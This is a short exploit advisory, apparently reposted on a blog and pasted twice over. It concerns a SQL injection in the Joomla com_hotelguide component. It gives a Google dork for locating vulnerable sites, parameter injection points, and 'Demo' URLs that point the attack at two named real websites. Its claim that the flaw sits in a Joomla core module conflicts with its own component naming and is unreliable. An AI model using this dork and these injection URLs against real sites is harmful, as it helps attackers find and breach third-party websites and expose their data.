#[+] Title: Exploit com_hotelguide Sql injection
#[+] Product: Joomla
#[+] Vendor: http://joomla.com
#[+] Author : Dz MinD injector
#[+] Facebook : https://www.facebook.com/Dz.MinD.Injector
#[+] Type : proof of concept
#[+] Tested on : Windows7
#[+] Date : 25/01/2016
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:index.php?option=com_hotelguide
#[+] Special Thanks : Howucan team
#[+] Visit : http://howucan.gr/
Freedoom To Palastine <3
#########################[!] Description ##################################
The SQL injection can enable an attacker to gain full administrative
access to a target website when combined with other security weaknesses in Joomla!
The SQL injection was discovered in a core module of Joomla!
"Itemid=" & "id=" field in '/index.php?option=com_hotelguide&view=country&Itemid='
and '/index.php?option=com_hotelguide&view=city&id='
is not properly sanitized, that leads to SQL Injection Vulnerability.
#########################[!] Proof Of Concept ##################################
http://localhost/path/index.php?option=com_hotelguide&view=city&id='[ inject Here ]
http://localhost/path//index.php?option=com_hotelguide&view=country&Itemid='[ inject Here ]
##Demo :
http://www.agrituristabruzzo.it/index.php?option=com_hotelguide&view=city&id=34'
http://www.stsitalia.it/index.php?option=com_hotelguide&view=country&Itemid=157'
#[+] Product: Joomla
#[+] Vendor: http://joomla.com
#[+] Author : Dz MinD injector
#[+] Facebook : https://www.facebook.com/Dz.MinD.Injector
#[+] Type : proof of concept
#[+] Tested on : Windows7
#[+] Date : 25/01/2016
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:index.php?option=com_hotelguide
#[+] Special Thanks : Howucan team
#[+] Visit : http://howucan.gr/
Freedoom To Palastine <3
#########################[!] Description ##################################
The SQL injection can enable an attacker to gain full administrative
access to a target website when combined with other security weaknesses in Joomla!
The SQL injection was discovered in a core module of Joomla!
"Itemid=" & "id=" field in '/index.php?option=com_hotelguide&view=country&Itemid='
and '/index.php?option=com_hotelguide&view=city&id='
is not properly sanitized, that leads to SQL Injection Vulnerability.
#########################[!] Proof Of Concept ##################################
http://localhost/path/index.php?option=com_hotelguide&view=city&id='[ inject Here ]
http://localhost/path//index.php?option=com_hotelguide&view=country&Itemid='[ inject Here ]
##Demo :
http://www.agrituristabruzzo.it/index.php?option=com_hotelguide&view=city&id=34'
http://www.stsitalia.it/index.php?option=com_hotelguide&view=country&Itemid=157'
0 nhận xét:
Post a Comment